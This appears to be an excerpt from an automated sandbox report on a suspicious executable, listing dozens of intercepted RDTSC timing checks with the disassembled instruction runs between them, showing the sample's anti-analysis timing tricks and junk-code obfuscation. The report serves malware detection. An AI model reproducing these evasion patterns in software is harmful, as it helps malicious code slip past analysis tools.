Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1627AC5 second address: 1627AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1627AC9 second address: 1627AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 162C9C8 second address: 162CA40 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F10C4816DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F10C4816DF8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D35A9h] 0x0000002b xor ebx, 6AD7BE4Ch 0x00000031 push 00000000h 0x00000033 movzx edi, si 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F10C4816DF8h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D2FAAh], edx 0x00000058 xchg eax, esi 0x00000059 jmp 00007F10C4816E00h 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 162DA0B second address: 162DA8F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 js 00007F10C4818118h 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D2C1Fh], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F10C4818118h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov ebx, dword ptr [ebp+122D35A9h] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F10C4818118h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 xor ebx, dword ptr [ebp+122D35C1h] 0x0000005c mov di, 5D67h 0x00000060 mov di, cx 0x00000063 push eax 0x00000064 push edi 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F10C481811Bh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 162E8BB second address: 162E8C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 162E8C6 second address: 162E935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 ja 00007F10C4818116h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 jno 00007F10C481812Fh 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F10C4818118h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 mov ebx, dword ptr [ebp+122D370Dh] 0x0000003c push 00000000h 0x0000003e mov di, B7F2h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push esi 0x00000046 jno 00007F10C4818116h 0x0000004c pop esi 0x0000004d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 162E935 second address: 162E93A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1628284 second address: 1628296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F10C4818118h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1628296 second address: 162829C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1630988 second address: 1630992 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 162BBB6 second address: 162BBEF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F10C4816E08h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F10C4816E06h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1630992 second address: 1630999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 162CC66 second address: 162CC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 162DBE9 second address: 162DBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1631C88 second address: 1631C97 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F10C4816DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16352C4 second address: 16352CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16352CA second address: 16352CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16352CE second address: 163535E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007F10C481812Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F10C4818118h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a jmp 00007F10C481811Eh 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F10C4818118h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b movsx ebx, di 0x0000004e push 00000000h 0x00000050 mov ebx, dword ptr [ebp+122D1B1Ch] 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F10C481811Ah 0x0000005e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163535E second address: 1635368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F10C4816DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1635368 second address: 1635383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c js 00007F10C481812Bh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163845A second address: 1638460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1638460 second address: 1638464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16394BE second address: 16394C8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F10C4816DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16394C8 second address: 16394E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4818127h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16394E3 second address: 16394E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16394E7 second address: 1639531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F10C4818118h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 sbb edi, 734A5A00h 0x0000002b push 00000000h 0x0000002d jmp 00007F10C481811Ah 0x00000032 push 00000000h 0x00000034 mov ebx, edi 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 je 00007F10C481811Ch 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1639531 second address: 1639535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1639535 second address: 163953B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163953B second address: 163953F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1630B82 second address: 1630B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1630B86 second address: 1630BA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jne 00007F10C4816DF6h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163A4F9 second address: 163A529 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F10C481812Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10C481811Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163A529 second address: 163A533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F10C4816DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163C603 second address: 163C608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1632E4A second address: 1632E60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1632E60 second address: 1632E65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1632E65 second address: 1632E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F10C4816E05h 0x00000012 jmp 00007F10C4816DFFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1632E86 second address: 1632F1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F10C4818118h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov edi, esi 0x00000026 and ebx, 5949D1B9h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 jmp 00007F10C481811Ah 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push eax 0x00000040 jp 00007F10C481811Ch 0x00000046 mov dword ptr [ebp+122D2244h], edx 0x0000004c pop edi 0x0000004d mov eax, dword ptr [ebp+122D0615h] 0x00000053 jmp 00007F10C481811Ch 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push ebx 0x0000005d call 00007F10C4818118h 0x00000062 pop ebx 0x00000063 mov dword ptr [esp+04h], ebx 0x00000067 add dword ptr [esp+04h], 0000001Ah 0x0000006f inc ebx 0x00000070 push ebx 0x00000071 ret 0x00000072 pop ebx 0x00000073 ret 0x00000074 push eax 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 push ebx 0x00000079 pop ebx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163550F second address: 16355BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push edx 0x0000000a add dword ptr [ebp+122D2E57h], ebx 0x00000010 pop edi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 or dword ptr [ebp+122D1D1Eh], eax 0x0000001e mov dword ptr [ebp+1245B886h], edx 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F10C4816DF8h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 jne 00007F10C4816E12h 0x0000004b ja 00007F10C4816E00h 0x00000051 mov eax, dword ptr [ebp+122D0C0Dh] 0x00000057 mov edi, ecx 0x00000059 push FFFFFFFFh 0x0000005b mov edi, 70A869C1h 0x00000060 nop 0x00000061 jmp 00007F10C4816E08h 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16355BA second address: 16355C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16467C0 second address: 16467C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16467C4 second address: 1646801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F10C4818123h 0x0000000d popad 0x0000000e push edx 0x0000000f jmp 00007F10C4818126h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jnp 00007F10C4818116h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163A765 second address: 163A77B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4816E02h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163A81F second address: 163A82D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163A82D second address: 163A831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1646936 second address: 1646946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 je 00007F10C4818126h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1646946 second address: 164694C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1646AF7 second address: 1646B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F10C4818124h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1646B17 second address: 1646B33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163C733 second address: 163C73D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F10C481811Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163C73D second address: 163C7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push ecx 0x0000000a call 00007F10C4816E03h 0x0000000f jnl 00007F10C4816DF6h 0x00000015 pop ebx 0x00000016 pop edi 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov bl, D3h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov ebx, dword ptr [ebp+122D31EBh] 0x0000002d mov eax, dword ptr [ebp+122D171Dh] 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F10C4816DF8h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push edi 0x00000052 call 00007F10C4816DF8h 0x00000057 pop edi 0x00000058 mov dword ptr [esp+04h], edi 0x0000005c add dword ptr [esp+04h], 0000001Bh 0x00000064 inc edi 0x00000065 push edi 0x00000066 ret 0x00000067 pop edi 0x00000068 ret 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d jnp 00007F10C4816DF6h 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163C7D3 second address: 163C7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163C7D8 second address: 163C7EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F10C4816DFFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164AFB5 second address: 164AFBB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164AFBB second address: 164AFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4816E01h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164AFD0 second address: 164AFD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164AFD4 second address: 164AFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164AFE3 second address: 164AFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164AFE7 second address: 164AFEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164FB70 second address: 164FB74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164FB74 second address: 164FB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164FB7A second address: 164FB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jbe 00007F10C4818116h 0x0000000d pop edi 0x0000000e jo 00007F10C481811Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1650543 second address: 1650550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007F10C4816DFCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1650550 second address: 16505A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4818125h 0x00000009 pushad 0x0000000a jmp 00007F10C4818123h 0x0000000f jne 00007F10C4818116h 0x00000015 push eax 0x00000016 pop eax 0x00000017 jng 00007F10C4818116h 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 push edi 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 jp 00007F10C4818116h 0x00000029 pop edi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e jc 00007F10C4818116h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16505A2 second address: 16505A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16505A6 second address: 16505AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16509F0 second address: 16509F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16509F6 second address: 16509FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16509FB second address: 1650A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16539BF second address: 16539F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop esi 0x00000010 jnp 00007F10C481812Fh 0x00000016 jmp 00007F10C4818123h 0x0000001b jg 00007F10C4818116h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16539F5 second address: 16539FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16539FB second address: 16539FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165A1F7 second address: 165A1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
